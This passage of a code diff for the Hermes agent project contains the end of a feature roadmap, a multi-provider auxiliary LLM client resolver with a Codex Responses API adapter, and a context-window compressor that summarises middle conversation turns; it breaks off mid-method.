| **Learnings** | Error patterns, gotchas, discovered fixes | Managed automatically |
**Tools to implement:**
- [ ] `save_learning(topic, learning, context?)` - Record a discovered pattern
```python
save_learning(
topic="python-ssl",
learning="On Ubuntu 22.04, SSL certificate errors often fixed by: apt install ca-certificates",
context="Debugging requests SSL failure"
)
```
- [ ] `search_learnings(query)` - Find relevant past learnings
```python
search_learnings("SSL certificate error Python")
# Returns: "On Ubuntu 22.04, SSL certificate errors often fixed by..."
```
**User Profile & Memory:**
- [ ] `user_profile` - Structured facts about user preferences
```yaml
# ~/.hermes/user_profile.yaml
coding_style:
python_formatter: black
type_hints: always
test_framework: pytest
preferences:
verbosity: detailed
confirm_destructive: true
environment:
os: linux
shell: bash
default_python: 3.11
```
- [ ] `user_memory` - Unstructured observations the agent learns
```yaml
# ~/.hermes/user_memory.yaml
- "User prefers tabs over spaces despite black's defaults"
- "User's main project is ~/work/myapp - a Django app"
- "User often works late - don't ask about timezone"
```
**When to learn:**
- After fixing an error that took multiple attempts
- When user corrects the agent's approach
- When a workaround is discovered for a tool limitation
- When user expresses a preference
**Storage:** Vector database (ChromaDB) or simple YAML with embedding search.
**Files to create:** `tools/learning_tools.py`, `learning/store.py`, `~/.hermes/learnings/`
---
## 15. Layered Context Architecture 📊
*Inspired by Dash's "Six Layers of Context" - grounding responses in multiple sources.*
**Problem:** Context sources are ad-hoc. No clear hierarchy or strategy for what context to include when.
**Proposed Layers for Hermes:**
| Layer | Source | When Loaded | Example |
|-------|--------|-------------|---------|
| 1. **Project Context** | `.hermes/context.md` | Auto on cwd | "This is a FastAPI project using PostgreSQL" |
| 2. **Skills** | `skills/*.md` | On request | "How to set up React project" |
| 3. **User Profile** | `~/.hermes/user_profile.yaml` | Always | "User prefers pytest, uses black" |
| 4. **Learnings** | `~/.hermes/learnings/` | Semantic search | "SSL fix for Ubuntu" |
| 5. **External Knowledge** | Web search, docs | On demand | Current API docs, Stack Overflow |
| 6. **Runtime Introspection** | Tool calls | Real-time | File contents, terminal output |
**Benefits:**
- Clear mental model for what context is available
- Prioritization: local > learned > external
- Debugging: "Why did agent do X?" → check which layers contributed
**Files to modify:** `run_agent.py` (context loading), new `context/layers.py`
---
## 16. Evaluation System with LLM Grading 📏
*Inspired by Dash's evaluation framework.*
**Problem:** `batch_runner.py` runs test cases but lacks quality assessment.
**Dash's Approach:**
- **String matching** (default) - Check if expected strings appear
- **LLM grader** (-g flag) - GPT evaluates response quality
- **Result comparison** (-r flag) - Compare against golden output
**Implementation for Hermes:**
- [ ] **Test case format:**
```python
TestCase(
name="create_python_project",
prompt="Create a new Python project with FastAPI and tests",
expected_strings=["requirements.txt", "main.py", "test_"], # Basic check
golden_actions=["write:main.py", "write:requirements.txt", "terminal:pip install"],
grader_criteria="Should create complete project structure with working code"
)
```
- [ ] **LLM grader mode:**
```python
def grade_response(response: str, criteria: str) -> Grade:
"""Use GPT to evaluate response quality."""
prompt = f"""
Evaluate this agent response against the criteria.
Criteria: {criteria}
Response: {response}
Score (1-5) and explain why.
"""
# Returns: Grade(score=4, explanation="Created all files but tests are minimal")
```
- [ ] **Action comparison mode:**
- Record tool calls made during test
- Compare against expected actions
- "Expected terminal call to pip install, got npm install"
- [ ] **CLI flags:**
```bash
python batch_runner.py eval test_cases.yaml # String matching
python batch_runner.py eval test_cases.yaml -g # + LLM grading
python batch_runner.py eval test_cases.yaml -r # + Result comparison
python batch_runner.py eval test_cases.yaml -v # Verbose (show responses)
```
**Files to modify:** `batch_runner.py`, new `evals/test_cases.py`, new `evals/grader.py`
---
*Last updated: $(date +%Y-%m-%d)* 🤖

6
agent/__init__.py Normal file
View File

@@ -0,0 +1,6 @@
"""Agent internals -- extracted modules from run_agent.py.
These modules contain pure utility functions and self-contained classes
that were previously embedded in the 3,600-line run_agent.py. Extracting
them makes run_agent.py focused on the AIAgent orchestrator class.
"""

600
agent/auxiliary_client.py Normal file
View File

@@ -0,0 +1,600 @@
"""Shared auxiliary OpenAI client for cheap/fast side tasks.
Provides a single resolution chain so every consumer (context compression,
session search, web extraction, vision analysis, browser vision) picks up
the best available backend without duplicating fallback logic.
Resolution order for text tasks (auto mode):
1. OpenRouter (OPENROUTER_API_KEY)
2. Nous Portal (~/.hermes/auth.json active provider)
3. Custom endpoint (OPENAI_BASE_URL + OPENAI_API_KEY)
4. Codex OAuth (Responses API via chatgpt.com with gpt-5.3-codex,
wrapped to look like a chat.completions client)
5. Direct API-key providers (z.ai/GLM, Kimi/Moonshot, MiniMax, MiniMax-CN)
— checked via PROVIDER_REGISTRY entries with auth_type='api_key'
6. None
Resolution order for vision/multimodal tasks (auto mode):
1. OpenRouter
2. Nous Portal
3. None (steps 3-5 are skipped — they may not support multimodal)
Per-task provider overrides (e.g. AUXILIARY_VISION_PROVIDER,
CONTEXT_COMPRESSION_PROVIDER) can force a specific provider for each task:
"openrouter", "nous", "codex", or "main" (= steps 3-5).
Default "auto" follows the chains above.
Per-task model overrides (e.g. AUXILIARY_VISION_MODEL,
AUXILIARY_WEB_EXTRACT_MODEL) let callers use a different model slug
than the provider's default.
"""
import json
import logging
import os
from pathlib import Path
from types import SimpleNamespace
from typing import Any, Dict, List, Optional, Tuple
from openai import OpenAI
from hermes_constants import OPENROUTER_BASE_URL
logger = logging.getLogger(__name__)
# Default auxiliary models for direct API-key providers (cheap/fast for side tasks)
_API_KEY_PROVIDER_AUX_MODELS: Dict[str, str] = {
"zai": "glm-4.5-flash",
"kimi-coding": "kimi-k2-turbo-preview",
"minimax": "MiniMax-M2.5-highspeed",
"minimax-cn": "MiniMax-M2.5-highspeed",
}
# OpenRouter app attribution headers
_OR_HEADERS = {
"HTTP-Referer": "https://github.com/NousResearch/hermes-agent",
"X-OpenRouter-Title": "Hermes Agent",
"X-OpenRouter-Categories": "productivity,cli-agent",
}
# Nous Portal extra_body for product attribution.
# Callers should pass this as extra_body in chat.completions.create()
# when the auxiliary client is backed by Nous Portal.
NOUS_EXTRA_BODY = {"tags": ["product=hermes-agent"]}
# Set at resolve time — True if the auxiliary client points to Nous Portal
auxiliary_is_nous: bool = False
# Default auxiliary models per provider
_OPENROUTER_MODEL = "google/gemini-3-flash-preview"
_NOUS_MODEL = "gemini-3-flash"
_NOUS_DEFAULT_BASE_URL = "https://inference-api.nousresearch.com/v1"
_AUTH_JSON_PATH = Path.home() / ".hermes" / "auth.json"
# Codex fallback: uses the Responses API (the only endpoint the Codex
# OAuth token can access) with a fast model for auxiliary tasks.
_CODEX_AUX_MODEL = "gpt-5.3-codex"
_CODEX_AUX_BASE_URL = "https://chatgpt.com/backend-api/codex"
# ── Codex Responses → chat.completions adapter ─────────────────────────────
# All auxiliary consumers call client.chat.completions.create(**kwargs) and
# read response.choices[0].message.content. This adapter translates those
# calls to the Codex Responses API so callers don't need any changes.
def _convert_content_for_responses(content: Any) -> Any:
"""Convert chat.completions content to Responses API format.
chat.completions uses:
{"type": "text", "text": "..."}
{"type": "image_url", "image_url": {"url": "data:image/png;base64,..."}}
Responses API uses:
{"type": "input_text", "text": "..."}
{"type": "input_image", "image_url": "data:image/png;base64,..."}
If content is a plain string, it's returned as-is (the Responses API
accepts strings directly for text-only messages).
"""
if isinstance(content, str):
return content
if not isinstance(content, list):
return str(content) if content else ""
converted: List[Dict[str, Any]] = []
for part in content:
if not isinstance(part, dict):
continue
ptype = part.get("type", "")
if ptype == "text":
converted.append({"type": "input_text", "text": part.get("text", "")})
elif ptype == "image_url":
# chat.completions nests the URL: {"image_url": {"url": "..."}}
image_data = part.get("image_url", {})
url = image_data.get("url", "") if isinstance(image_data, dict) else str(image_data)
entry: Dict[str, Any] = {"type": "input_image", "image_url": url}
# Preserve detail if specified
detail = image_data.get("detail") if isinstance(image_data, dict) else None
if detail:
entry["detail"] = detail
converted.append(entry)
elif ptype in ("input_text", "input_image"):
# Already in Responses format — pass through
converted.append(part)
else:
# Unknown content type — try to preserve as text
text = part.get("text", "")
if text:
converted.append({"type": "input_text", "text": text})
return converted or ""
class _CodexCompletionsAdapter:
"""Drop-in shim that accepts chat.completions.create() kwargs and
routes them through the Codex Responses streaming API."""
def __init__(self, real_client: OpenAI, model: str):
self._client = real_client
self._model = model
def create(self, **kwargs) -> Any:
messages = kwargs.get("messages", [])
model = kwargs.get("model", self._model)
temperature = kwargs.get("temperature")
# Separate system/instructions from conversation messages.
# Convert chat.completions multimodal content blocks to Responses
# API format (input_text / input_image instead of text / image_url).
instructions = "You are a helpful assistant."
input_msgs: List[Dict[str, Any]] = []
for msg in messages:
role = msg.get("role", "user")
content = msg.get("content") or ""
if role == "system":
instructions = content if isinstance(content, str) else str(content)
else:
input_msgs.append({
"role": role,
"content": _convert_content_for_responses(content),
})
resp_kwargs: Dict[str, Any] = {
"model": model,
"instructions": instructions,
"input": input_msgs or [{"role": "user", "content": ""}],
"store": False,
}
# Note: the Codex endpoint (chatgpt.com/backend-api/codex) does NOT
# support max_output_tokens or temperature — omit to avoid 400 errors.
# Tools support for flush_memories and similar callers
tools = kwargs.get("tools")
if tools:
converted = []
for t in tools:
fn = t.get("function", {}) if isinstance(t, dict) else {}
name = fn.get("name")
if not name:
continue
converted.append({
"type": "function",
"name": name,
"description": fn.get("description", ""),
"parameters": fn.get("parameters", {}),
})
if converted:
resp_kwargs["tools"] = converted
# Stream and collect the response
text_parts: List[str] = []
tool_calls_raw: List[Any] = []
usage = None
try:
with self._client.responses.stream(**resp_kwargs) as stream:
for _event in stream:
pass
final = stream.get_final_response()
# Extract text and tool calls from the Responses output
for item in getattr(final, "output", []):
item_type = getattr(item, "type", None)
if item_type == "message":
for part in getattr(item, "content", []):
ptype = getattr(part, "type", None)
if ptype in ("output_text", "text"):
text_parts.append(getattr(part, "text", ""))
elif item_type == "function_call":
tool_calls_raw.append(SimpleNamespace(
id=getattr(item, "call_id", ""),
type="function",
function=SimpleNamespace(
name=getattr(item, "name", ""),
arguments=getattr(item, "arguments", "{}"),
),
))
resp_usage = getattr(final, "usage", None)
if resp_usage:
usage = SimpleNamespace(
prompt_tokens=getattr(resp_usage, "input_tokens", 0),
completion_tokens=getattr(resp_usage, "output_tokens", 0),
total_tokens=getattr(resp_usage, "total_tokens", 0),
)
except Exception as exc:
logger.debug("Codex auxiliary Responses API call failed: %s", exc)
raise
content = "".join(text_parts).strip() or None
# Build a response that looks like chat.completions
message = SimpleNamespace(
role="assistant",
content=content,
tool_calls=tool_calls_raw or None,
)
choice = SimpleNamespace(
index=0,
message=message,
finish_reason="stop" if not tool_calls_raw else "tool_calls",
)
return SimpleNamespace(
choices=[choice],
model=model,
usage=usage,
)
class _CodexChatShim:
"""Wraps the adapter to provide client.chat.completions.create()."""
def __init__(self, adapter: _CodexCompletionsAdapter):
self.completions = adapter
class CodexAuxiliaryClient:
"""OpenAI-client-compatible wrapper that routes through Codex Responses API.
Consumers can call client.chat.completions.create(**kwargs) as normal.
Also exposes .api_key and .base_url for introspection by async wrappers.
"""
def __init__(self, real_client: OpenAI, model: str):
self._real_client = real_client
adapter = _CodexCompletionsAdapter(real_client, model)
self.chat = _CodexChatShim(adapter)
self.api_key = real_client.api_key
self.base_url = real_client.base_url
def close(self):
self._real_client.close()
class _AsyncCodexCompletionsAdapter:
"""Async version of the Codex Responses adapter.
Wraps the sync adapter via asyncio.to_thread() so async consumers
(web_tools, session_search) can await it as normal.
"""
def __init__(self, sync_adapter: _CodexCompletionsAdapter):
self._sync = sync_adapter
async def create(self, **kwargs) -> Any:
import asyncio
return await asyncio.to_thread(self._sync.create, **kwargs)
class _AsyncCodexChatShim:
def __init__(self, adapter: _AsyncCodexCompletionsAdapter):
self.completions = adapter
class AsyncCodexAuxiliaryClient:
"""Async-compatible wrapper matching AsyncOpenAI.chat.completions.create()."""
def __init__(self, sync_wrapper: "CodexAuxiliaryClient"):
sync_adapter = sync_wrapper.chat.completions
async_adapter = _AsyncCodexCompletionsAdapter(sync_adapter)
self.chat = _AsyncCodexChatShim(async_adapter)
self.api_key = sync_wrapper.api_key
self.base_url = sync_wrapper.base_url
def _read_nous_auth() -> Optional[dict]:
"""Read and validate ~/.hermes/auth.json for an active Nous provider.
Returns the provider state dict if Nous is active with tokens,
otherwise None.
"""
try:
if not _AUTH_JSON_PATH.is_file():
return None
data = json.loads(_AUTH_JSON_PATH.read_text())
if data.get("active_provider") != "nous":
return None
provider = data.get("providers", {}).get("nous", {})
# Must have at least an access_token or agent_key
if not provider.get("agent_key") and not provider.get("access_token"):
return None
return provider
except Exception as exc:
logger.debug("Could not read Nous auth: %s", exc)
return None
def _nous_api_key(provider: dict) -> str:
"""Extract the best API key from a Nous provider state dict."""
return provider.get("agent_key") or provider.get("access_token", "")
def _nous_base_url() -> str:
"""Resolve the Nous inference base URL from env or default."""
return os.getenv("NOUS_INFERENCE_BASE_URL", _NOUS_DEFAULT_BASE_URL)
def _read_codex_access_token() -> Optional[str]:
"""Read a valid Codex OAuth access token from Hermes auth store (~/.hermes/auth.json)."""
try:
from hermes_cli.auth import _read_codex_tokens
data = _read_codex_tokens()
tokens = data.get("tokens", {})
access_token = tokens.get("access_token")
if isinstance(access_token, str) and access_token.strip():
return access_token.strip()
return None
except Exception as exc:
logger.debug("Could not read Codex auth for auxiliary client: %s", exc)
return None
def _resolve_api_key_provider() -> Tuple[Optional[OpenAI], Optional[str]]:
"""Try each API-key provider in PROVIDER_REGISTRY order.
Returns (client, model) for the first provider whose env var is set,
or (None, None) if none are configured.
"""
try:
from hermes_cli.auth import PROVIDER_REGISTRY
except ImportError:
logger.debug("Could not import PROVIDER_REGISTRY for API-key fallback")
return None, None
for provider_id, pconfig in PROVIDER_REGISTRY.items():
if pconfig.auth_type != "api_key":
continue
# Check if any of the provider's env vars are set
api_key = ""
for env_var in pconfig.api_key_env_vars:
val = os.getenv(env_var, "").strip()
if val:
api_key = val
break
if not api_key:
continue
# Resolve base URL (with optional env-var override)
# Kimi Code keys (sk-kimi-) need api.kimi.com/coding/v1
env_url = ""
if pconfig.base_url_env_var:
env_url = os.getenv(pconfig.base_url_env_var, "").strip()
if env_url:
base_url = env_url.rstrip("/")
elif provider_id == "kimi-coding" and api_key.startswith("sk-kimi-"):
base_url = "https://api.kimi.com/coding/v1"
else:
base_url = pconfig.inference_base_url
model = _API_KEY_PROVIDER_AUX_MODELS.get(provider_id, "default")
logger.debug("Auxiliary text client: %s (%s)", pconfig.name, model)
extra = {}
if "api.kimi.com" in base_url.lower():
extra["default_headers"] = {"User-Agent": "KimiCLI/1.0"}
return OpenAI(api_key=api_key, base_url=base_url, **extra), model
return None, None
# ── Provider resolution helpers ─────────────────────────────────────────────
def _get_auxiliary_provider(task: str = "") -> str:
"""Read the provider override for a specific auxiliary task.
Checks AUXILIARY_{TASK}_PROVIDER first (e.g. AUXILIARY_VISION_PROVIDER),
then CONTEXT_{TASK}_PROVIDER (for the compression section's summary_provider),
then falls back to "auto". Returns one of: "auto", "openrouter", "nous", "main".
"""
if task:
for prefix in ("AUXILIARY_", "CONTEXT_"):
val = os.getenv(f"{prefix}{task.upper()}_PROVIDER", "").strip().lower()
if val and val != "auto":
return val
return "auto"
def _try_openrouter() -> Tuple[Optional[OpenAI], Optional[str]]:
or_key = os.getenv("OPENROUTER_API_KEY")
if not or_key:
return None, None
logger.debug("Auxiliary client: OpenRouter")
return OpenAI(api_key=or_key, base_url=OPENROUTER_BASE_URL,
default_headers=_OR_HEADERS), _OPENROUTER_MODEL
def _try_nous() -> Tuple[Optional[OpenAI], Optional[str]]:
nous = _read_nous_auth()
if not nous:
return None, None
global auxiliary_is_nous
auxiliary_is_nous = True
logger.debug("Auxiliary client: Nous Portal")
return (
OpenAI(api_key=_nous_api_key(nous), base_url=_nous_base_url()),
_NOUS_MODEL,
)
def _try_custom_endpoint() -> Tuple[Optional[OpenAI], Optional[str]]:
custom_base = os.getenv("OPENAI_BASE_URL")
custom_key = os.getenv("OPENAI_API_KEY")
if not custom_base or not custom_key:
return None, None
model = os.getenv("OPENAI_MODEL") or os.getenv("LLM_MODEL") or "gpt-4o-mini"
logger.debug("Auxiliary client: custom endpoint (%s)", model)
return OpenAI(api_key=custom_key, base_url=custom_base), model
def _try_codex() -> Tuple[Optional[Any], Optional[str]]:
codex_token = _read_codex_access_token()
if not codex_token:
return None, None
logger.debug("Auxiliary client: Codex OAuth (%s via Responses API)", _CODEX_AUX_MODEL)
real_client = OpenAI(api_key=codex_token, base_url=_CODEX_AUX_BASE_URL)
return CodexAuxiliaryClient(real_client, _CODEX_AUX_MODEL), _CODEX_AUX_MODEL
def _resolve_forced_provider(forced: str) -> Tuple[Optional[OpenAI], Optional[str]]:
"""Resolve a specific forced provider. Returns (None, None) if creds missing."""
if forced == "openrouter":
client, model = _try_openrouter()
if client is None:
logger.warning("auxiliary.provider=openrouter but OPENROUTER_API_KEY not set")
return client, model
if forced == "nous":
client, model = _try_nous()
if client is None:
logger.warning("auxiliary.provider=nous but Nous Portal not configured (run: hermes login)")
return client, model
if forced == "codex":
client, model = _try_codex()
if client is None:
logger.warning("auxiliary.provider=codex but no Codex OAuth token found (run: hermes model)")
return client, model
if forced == "main":
# "main" = skip OpenRouter/Nous, use the main chat model's credentials.
for try_fn in (_try_custom_endpoint, _try_codex, _resolve_api_key_provider):
client, model = try_fn()
if client is not None:
return client, model
logger.warning("auxiliary.provider=main but no main endpoint credentials found")
return None, None
# Unknown provider name — fall through to auto
logger.warning("Unknown auxiliary.provider=%r, falling back to auto", forced)
return None, None
def _resolve_auto() -> Tuple[Optional[OpenAI], Optional[str]]:
"""Full auto-detection chain: OpenRouter → Nous → custom → Codex → API-key → None."""
for try_fn in (_try_openrouter, _try_nous, _try_custom_endpoint,
_try_codex, _resolve_api_key_provider):
client, model = try_fn()
if client is not None:
return client, model
logger.debug("Auxiliary client: none available")
return None, None
# ── Public API ──────────────────────────────────────────────────────────────
def get_text_auxiliary_client(task: str = "") -> Tuple[Optional[OpenAI], Optional[str]]:
"""Return (client, default_model_slug) for text-only auxiliary tasks.
Args:
task: Optional task name ("compression", "web_extract") to check
for a task-specific provider override.
Callers may override the returned model with a per-task env var
(e.g. CONTEXT_COMPRESSION_MODEL, AUXILIARY_WEB_EXTRACT_MODEL).
"""
forced = _get_auxiliary_provider(task)
if forced != "auto":
return _resolve_forced_provider(forced)
return _resolve_auto()
def get_async_text_auxiliary_client(task: str = ""):
"""Return (async_client, model_slug) for async consumers.
For standard providers returns (AsyncOpenAI, model). For Codex returns
(AsyncCodexAuxiliaryClient, model) which wraps the Responses API.
Returns (None, None) when no provider is available.
"""
from openai import AsyncOpenAI
sync_client, model = get_text_auxiliary_client(task)
if sync_client is None:
return None, None
if isinstance(sync_client, CodexAuxiliaryClient):
return AsyncCodexAuxiliaryClient(sync_client), model
async_kwargs = {
"api_key": sync_client.api_key,
"base_url": str(sync_client.base_url),
}
if "openrouter" in str(sync_client.base_url).lower():
async_kwargs["default_headers"] = dict(_OR_HEADERS)
elif "api.kimi.com" in str(sync_client.base_url).lower():
async_kwargs["default_headers"] = {"User-Agent": "KimiCLI/1.0"}
return AsyncOpenAI(**async_kwargs), model
def get_vision_auxiliary_client() -> Tuple[Optional[OpenAI], Optional[str]]:
"""Return (client, default_model_slug) for vision/multimodal auxiliary tasks.
Checks AUXILIARY_VISION_PROVIDER for a forced provider, otherwise
auto-detects. Callers may override the returned model with
AUXILIARY_VISION_MODEL.
In auto mode, only providers known to support multimodal are tried:
OpenRouter, Nous Portal, and Codex OAuth (gpt-5.3-codex supports
vision via the Responses API). Custom endpoints and API-key
providers are skipped — they may not handle vision input. To use
them, set AUXILIARY_VISION_PROVIDER explicitly.
"""
forced = _get_auxiliary_provider("vision")
if forced != "auto":
return _resolve_forced_provider(forced)
# Auto: try providers known to support multimodal first, then fall
# back to the user's custom endpoint. Many local models (Qwen-VL,
# LLaVA, Pixtral, etc.) support vision — skipping them entirely
# caused silent failures for local-only users.
for try_fn in (_try_openrouter, _try_nous, _try_codex,
_try_custom_endpoint):
client, model = try_fn()
if client is not None:
return client, model
logger.debug("Auxiliary vision client: none available")
return None, None
def get_auxiliary_extra_body() -> dict:
"""Return extra_body kwargs for auxiliary API calls.
Includes Nous Portal product tags when the auxiliary client is backed
by Nous Portal. Returns empty dict otherwise.
"""
return dict(NOUS_EXTRA_BODY) if auxiliary_is_nous else {}
def auxiliary_max_tokens_param(value: int) -> dict:
"""Return the correct max tokens kwarg for the auxiliary client's provider.
OpenRouter and local models use 'max_tokens'. Direct OpenAI with newer
models (gpt-4o, o-series, gpt-5+) requires 'max_completion_tokens'.
The Codex adapter translates max_tokens internally, so we use max_tokens
for it as well.
"""
custom_base = os.getenv("OPENAI_BASE_URL", "")
or_key = os.getenv("OPENROUTER_API_KEY")
# Only use max_completion_tokens for direct OpenAI custom endpoints
if (not or_key
and _read_nous_auth() is None
and "api.openai.com" in custom_base.lower()):
return {"max_completion_tokens": value}
return {"max_tokens": value}

365
agent/context_compressor.py Normal file
View File

@@ -0,0 +1,365 @@
"""Automatic context window compression for long conversations.
Self-contained class with its own OpenAI client for summarization.
Uses Gemini Flash (cheap/fast) to summarize middle turns while
protecting head and tail context.
"""
import logging
import os
from typing import Any, Dict, List, Optional
from agent.auxiliary_client import get_text_auxiliary_client
from agent.model_metadata import (
get_model_context_length,
estimate_messages_tokens_rough,
)
logger = logging.getLogger(__name__)
class ContextCompressor:
"""Compresses conversation context when approaching the model's context limit.
Algorithm: protect first N + last N turns, summarize everything in between.
Token tracking uses actual counts from API responses for accuracy.
"""
def __init__(
self,
model: str,
threshold_percent: float = 0.85,
protect_first_n: int = 3,
protect_last_n: int = 4,
summary_target_tokens: int = 2500,
quiet_mode: bool = False,
summary_model_override: str = None,
base_url: str = "",
):
self.model = model
self.base_url = base_url
self.threshold_percent = threshold_percent
self.protect_first_n = protect_first_n
self.protect_last_n = protect_last_n
self.summary_target_tokens = summary_target_tokens
self.quiet_mode = quiet_mode
self.context_length = get_model_context_length(model, base_url=base_url)
self.threshold_tokens = int(self.context_length * threshold_percent)
self.compression_count = 0
self._context_probed = False # True after a step-down from context error
self.last_prompt_tokens = 0
self.last_completion_tokens = 0
self.last_total_tokens = 0
self.client, default_model = get_text_auxiliary_client("compression")
self.summary_model = summary_model_override or default_model
def update_from_response(self, usage: Dict[str, Any]):
"""Update tracked token usage from API response."""
self.last_prompt_tokens = usage.get("prompt_tokens", 0)
self.last_completion_tokens = usage.get("completion_tokens", 0)
self.last_total_tokens = usage.get("total_tokens", 0)
def should_compress(self, prompt_tokens: int = None) -> bool:
"""Check if context exceeds the compression threshold."""
tokens = prompt_tokens if prompt_tokens is not None else self.last_prompt_tokens
return tokens >= self.threshold_tokens
def should_compress_preflight(self, messages: List[Dict[str, Any]]) -> bool:
"""Quick pre-flight check using rough estimate (before API call)."""
rough_estimate = estimate_messages_tokens_rough(messages)
return rough_estimate >= self.threshold_tokens
def get_status(self) -> Dict[str, Any]:
"""Get current compression status for display/logging."""
return {
"last_prompt_tokens": self.last_prompt_tokens,
"threshold_tokens": self.threshold_tokens,
"context_length": self.context_length,
"usage_percent": (self.last_prompt_tokens / self.context_length * 100) if self.context_length else 0,
"compression_count": self.compression_count,
}
def _generate_summary(self, turns_to_summarize: List[Dict[str, Any]]) -> Optional[str]:
"""Generate a concise summary of conversation turns.
Tries the auxiliary model first, then falls back to the user's main
model. Returns None if all attempts fail — the caller should drop
the middle turns without a summary rather than inject a useless
placeholder.
"""
parts = []
for msg in turns_to_summarize:
role = msg.get("role", "unknown")
content = msg.get("content") or ""
if len(content) > 2000:
content = content[:1000] + "\n...[truncated]...\n" + content[-500:]
tool_calls = msg.get("tool_calls", [])
if tool_calls:
tool_names = [tc.get("function", {}).get("name", "?") for tc in tool_calls if isinstance(tc, dict)]
content += f"\n[Tool calls: {', '.join(tool_names)}]"
parts.append(f"[{role.upper()}]: {content}")
content_to_summarize = "\n\n".join(parts)
prompt = f"""Summarize these conversation turns concisely. This summary will replace these turns in the conversation history.
Write from a neutral perspective describing:
1. What actions were taken (tool calls, searches, file operations)
2. Key information or results obtained
3. Important decisions or findings
4. Relevant data, file names, or outputs
Keep factual and informative. Target ~{self.summary_target_tokens} tokens.
---
TURNS TO SUMMARIZE:
{content_to_summarize}
---
Write only the summary, starting with "[CONTEXT SUMMARY]:" prefix."""
# 1. Try the auxiliary model (cheap/fast)
if self.client:
try:
return self._call_summary_model(self.client, self.summary_model, prompt)
except Exception as e:
logging.warning(f"Failed to generate context summary with auxiliary model: {e}")
# 2. Fallback: try the user's main model endpoint
fallback_client, fallback_model = self._get_fallback_client()
if fallback_client is not None:
try:
logger.info("Retrying context summary with main model (%s)", fallback_model)
summary = self._call_summary_model(fallback_client, fallback_model, prompt)
self.client = fallback_client
self.summary_model = fallback_model
return summary
except Exception as fallback_err:
logging.warning(f"Main model summary also failed: {fallback_err}")
# 3. All models failed — return None so the caller drops turns without a summary
logging.warning("Context compression: no model available for summary. Middle turns will be dropped without summary.")
return None
def _call_summary_model(self, client, model: str, prompt: str) -> str:
"""Make the actual LLM call to generate a summary. Raises on failure."""
kwargs = {
"model": model,
"messages": [{"role": "user", "content": prompt}],
"temperature": 0.3,
"timeout": 30.0,
}
# Most providers (OpenRouter, local models) use max_tokens.
# Direct OpenAI with newer models (gpt-4o, o-series, gpt-5+)
# requires max_completion_tokens instead.
try:
kwargs["max_tokens"] = self.summary_target_tokens * 2
response = client.chat.completions.create(**kwargs)
except Exception as first_err:
if "max_tokens" in str(first_err) or "unsupported_parameter" in str(first_err):
kwargs.pop("max_tokens", None)
kwargs["max_completion_tokens"] = self.summary_target_tokens * 2
response = client.chat.completions.create(**kwargs)
else:
raise
summary = response.choices[0].message.content.strip()
if not summary.startswith("[CONTEXT SUMMARY]:"):
summary = "[CONTEXT SUMMARY]: " + summary
return summary
def _get_fallback_client(self):
"""Try to build a fallback client from the main model's endpoint config.
When the primary auxiliary client fails (e.g. stale OpenRouter key), this
creates a client using the user's active custom endpoint (OPENAI_BASE_URL)
so compression can still produce a real summary instead of a static string.
Returns (client, model) or (None, None).
"""
custom_base = os.getenv("OPENAI_BASE_URL")
custom_key = os.getenv("OPENAI_API_KEY")
if not custom_base or not custom_key:
return None, None
# Don't fallback to the same provider that just failed
from hermes_constants import OPENROUTER_BASE_URL
if custom_base.rstrip("/") == OPENROUTER_BASE_URL.rstrip("/"):
return None, None
model = os.getenv("LLM_MODEL") or os.getenv("OPENAI_MODEL") or self.model
try:
from openai import OpenAI as _OpenAI
client = _OpenAI(api_key=custom_key, base_url=custom_base)
logger.debug("Built fallback auxiliary client: %s via %s", model, custom_base)
return client, model
except Exception as exc:
logger.debug("Could not build fallback auxiliary client: %s", exc)
return None, None
# ------------------------------------------------------------------
# Tool-call / tool-result pair integrity helpers
# ------------------------------------------------------------------
@staticmethod
def _get_tool_call_id(tc) -> str:
"""Extract the call ID from a tool_call entry (dict or SimpleNamespace)."""
if isinstance(tc, dict):
return tc.get("id", "")
return getattr(tc, "id", "") or ""
def _sanitize_tool_pairs(self, messages: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""Fix orphaned tool_call / tool_result pairs after compression.
Two failure modes:
1. A tool *result* references a call_id whose assistant tool_call was
removed (summarized/truncated). The API rejects this with
"No tool call found for function call output with call_id ...".
2. An assistant message has tool_calls whose results were dropped.
The API rejects this because every tool_call must be followed by
a tool result with the matching call_id.
This method removes orphaned results and inserts stub results for
orphaned calls so the message list is always well-formed.
"""
surviving_call_ids: set = set()
for msg in messages:
if msg.get("role") == "assistant":
for tc in msg.get("tool_calls") or []:
cid = self._get_tool_call_id(tc)
if cid:
surviving_call_ids.add(cid)
result_call_ids: set = set()
for msg in messages:
if msg.get("role") == "tool":
cid = msg.get("tool_call_id")
if cid:
result_call_ids.add(cid)
# 1. Remove tool results whose call_id has no matching assistant tool_call
orphaned_results = result_call_ids - surviving_call_ids
if orphaned_results:
messages = [
m for m in messages
if not (m.get("role") == "tool" and m.get("tool_call_id") in orphaned_results)
]
if not self.quiet_mode:
logger.info("Compression sanitizer: removed %d orphaned tool result(s)", len(orphaned_results))
# 2. Add stub results for assistant tool_calls whose results were dropped
missing_results = surviving_call_ids - result_call_ids
if missing_results:
patched: List[Dict[str, Any]] = []
for msg in messages:
patched.append(msg)
if msg.get("role") == "assistant":
for tc in msg.get("tool_calls") or []:
cid = self._get_tool_call_id(tc)
if cid in missing_results:
patched.append({
"role": "tool",
"content": "[Result from earlier conversation — see context summary above]",
"tool_call_id": cid,
})
messages = patched
if not self.quiet_mode:
logger.info("Compression sanitizer: added %d stub tool result(s)", len(missing_results))
return messages
def _align_boundary_forward(self, messages: List[Dict[str, Any]], idx: int) -> int:
"""Push a compress-start boundary forward past any orphan tool results.
If ``messages[idx]`` is a tool result, slide forward until we hit a
non-tool message so we don't start the summarised region mid-group.
"""
while idx < len(messages) and messages[idx].get("role") == "tool":
idx += 1
return idx
def _align_boundary_backward(self, messages: List[Dict[str, Any]], idx: int) -> int:
"""Pull a compress-end boundary backward to avoid splitting a
tool_call / result group.
If the message just before ``idx`` is an assistant message with
tool_calls, those tool results will start at ``idx`` and would be
separated from their parent. Move backwards to include the whole
group in the summarised region.
"""
if idx <= 0 or idx >= len(messages):
return idx
prev = messages[idx - 1]
if prev.get("role") == "assistant" and prev.get("tool_calls"):
# The results for this assistant turn sit at idx..idx+k.
# Include the assistant message in the summarised region too.
idx -= 1
return idx
def compress(self, messages: List[Dict[str, Any]], current_tokens: int = None) -> List[Dict[str, Any]]:
"""Compress conversation messages by summarizing middle turns.
Keeps first N + last N turns, summarizes everything in between.
After compression, orphaned tool_call / tool_result pairs are cleaned
up so the API never receives mismatched IDs.
"""
n_messages = len(messages)
if n_messages <= self.protect_first_n + self.protect_last_n + 1:
